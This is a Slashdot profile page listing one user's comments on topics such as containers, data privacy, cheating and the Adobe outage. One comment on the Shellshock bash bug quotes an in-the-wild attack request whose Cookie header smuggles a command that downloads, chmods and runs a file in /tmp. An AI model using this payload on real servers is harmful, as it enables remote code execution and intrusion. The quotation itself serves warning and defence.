Want to read Slashdot from your mobile device? Point it at m.slashdot.org and keep reading!


Forgot your password?

Slashdot videos: Now with more Slashdot!

  • View

  • Discuss

  • Share

We've improved Slashdot's video section; now you can view our video interviews, product close-ups and site visits with all the usual Slashdot options to comment, share, etc. No more walled garden! It's a work in progress -- we hope you'll check it out (Learn more about the recent updates).


Comment: A number of free options at Turnkey Linux (Score 1) 343

by xanthos (#49075301) Attached to: Ask Slashdot: Version Control For Non-Developers?

A great resource for situations like this is Turnkey Linux (http://www.turnkeylinux.org). They host a wide variety of fully built server images that make it easy to try out a number of systems to see what best fits your need. You can download and fire up well known CMS like Drupal or plone and see if they fit the need or not. Then if there is something they like they can load the iso on a bare metal box and go.

Comment: On the Internet, no one knows that you are a dog (Score 1) 62

by xanthos (#48757133) Attached to: CES 2015: FTC Head Warns About Data Grabbed By Smart Gadgets

Really people? Your lives are so fascinating that you need to keep the details away from the digital paparazzi? Mine sure isn't.

Here is my take on what is going on here. First, the government doesn't care. Have you heard about the huge number of people arrested for having pictures on Facebook showing drug use? No? Well that is because it's not a threat to the greater good and not worth the time and effort to prosecute. Not even a cursory email saying to clean up your act or we will send you a more strongly worded email. Many of us may have dissident thoughts but we don't do dissident acts and are mostly harmless. So that leaves the Big Business boogie man with a financial motive. In the beginning there was the trifecta of terror, the credit rating agencies. They, with their magical patented Fair Issac scoring formula, have claimed for years that those numbers offer a glimpse into a persons soul. And they basically market it as such even when the intended use is based more on correlation than causation. As evidence I present the recent use of credit scores by insurance companies. My credit score has never been affected by my driving history, so why should my car insurance rates be based on my credit score? In my case I was given the option of allowing it or not. Allowing it could have saved me as much as 3%!, or cost me more, in any case the amount did not benefit me enough to make it worth my while. Same with the followup offer to install their OBD digital spy.

There are a bunch of people who think they can make a fortune collecting other peoples data. Reality is that most of that data is mundane garbage that has very little value to it. Much like the millions and millions of credit card numbers that have been compromised. Collecting the information is easy, monetizing it is hard.

Comment: Have we come full circle? (Score 1) 71

by xanthos (#48508737) Attached to: CoreOS Announces Competitor To Docker

I can't shake the feeling that I've seen this movie before, I think it was called "statically linked executables" where all the code needed to run the application resided in one place. Then as the executables got more complex they got much larger, consumed more resources, and large parts of each executable was redundant with each other. Hence static executables were superceded by "dynamically linked executables" which pulled out the redundancies into general purpose libraries that existed in only one place which led to dll version hell. So now we have containers which allows an application to be bundled up with just the code it needs to execute.

And yes, containers have more capabilities than simply isolating the code. However I would argue that code isolation is the primary use of containers.

I have a prediction, that by the end of 2015 we will see one of the container vendors offer a version that allows for "code sharing" between a master image and the individual containers in order to cut down on redundancy. Full Circle++.

Comment: Beware of the Dark Side! (Score 1) 320

by xanthos (#48371391) Attached to: Duke: No Mercy For CS 201 Cheaters Who Don't Turn Selves In By Wednesday

Luke: Is the dark side stronger?
Yoda: No, no, no. Quicker, easier, more seductive.

In so many subject areas you have the option of the quick and easy way or the more thorough slog through the fundamentals. Unfortunately, when you are young, the long term advantages of mastering the fundamentals is lost when compared to the short term gratification of getting an assignment done.

There have been many discussions here on Slashdot regarding the issues caused by people who do not understand the fundamentals of their jobs. Coders who cannot code efficiently because they do not understand what makes code inefficient or efficient or how to test for potential improvements. Personally I am aghast at the number of web developers I have run into who are clueless when it comes to networking. Since they have libraries and frameworks for that they don't feel the need to personally understand it. Don't even get me started on the horrible, horrible SQL queries I have seen. There is only so much optimization that can be done on the backend by the optimizing routines written by people who do know the fundamentals.

In the end, too many students seem to not understand the purpose of an "Education" and have confused it with its simpler cousin, "Job training".

Comment: So the REAL problem is ... (Score 1) 429

by xanthos (#48113679) Attached to: BitHammer, the BitTorrent Banhammer

1) ignorant bit torrent user who doesn't know how to configure their software to play nice in public
2) ignorant free wifi supplier who doesn't know how to configure their router for QOS
3) ignorant noob who relies on there being free wifi in order to do his job

There is a reason I've used this sig for years.

Comment: Will there be roundabouts? (Score 1) 86

by xanthos (#48084699) Attached to: Michigan Builds Driverless Town For Testing Autonomous Cars

I was in Carmel Indiana, a northern Indianapolis suburb, last week. Since the 1990's they have been replacing all of the main intersections with roundabouts. They have over 60 of them now.

While roundabouts have been proven to be safer for average drivers, how easy are they for autonomous vehicles to navigate vs your standard intersection? Is a roundabout an asset to the adoption of autonomous vehicles, a hinderance or a wash?

Comment: Yes it is being exploited (Score 5, Informative) 318

by xanthos (#47996085) Attached to: Flurry of Scans Hint That Bash Vulnerability Could Already Be In the Wild

There is evidence that this is being exploited in the wild.
Nginx and Apache servers using mod_cgi are two potentially vulnerable services.

The risk is that it is possible to modify environment variables which then could allow the execution of arbitrary code with the permissions of the parent process.

An example attack:

GET./.HTTP/1.0 .User-Agent:.Thanks-Rob .Cookie:().{.:;.};.wget.-O./tmp/besh.;.chmod.777./tmp/besh;./tmp/besh;

Over at the Internet Storm Center http://isc.sans.org/ they have been updating their advisory and and a have a simple one-liner to test if a system is vulnerable.

Comment: Adobe better take a look at their SLA (Score 3, Insightful) 74

by xanthos (#47018895) Attached to: Adobe Creative Cloud Is Back

If one of our sites was down for as long as Adobe's was, heads would roll.

What took so long to restore? Crappy process for restoring server images or recovering a database?

Or, as others have speculated, was there a security breach and they couldn't bring it back up until all the evidence was gathered and the vulnerability was closed.

Oh wait, this is Adobe we are talking about. Their code doesn't have vulnerabilities.

fortune: cpu time/usefulness ratio too high -- core dumped.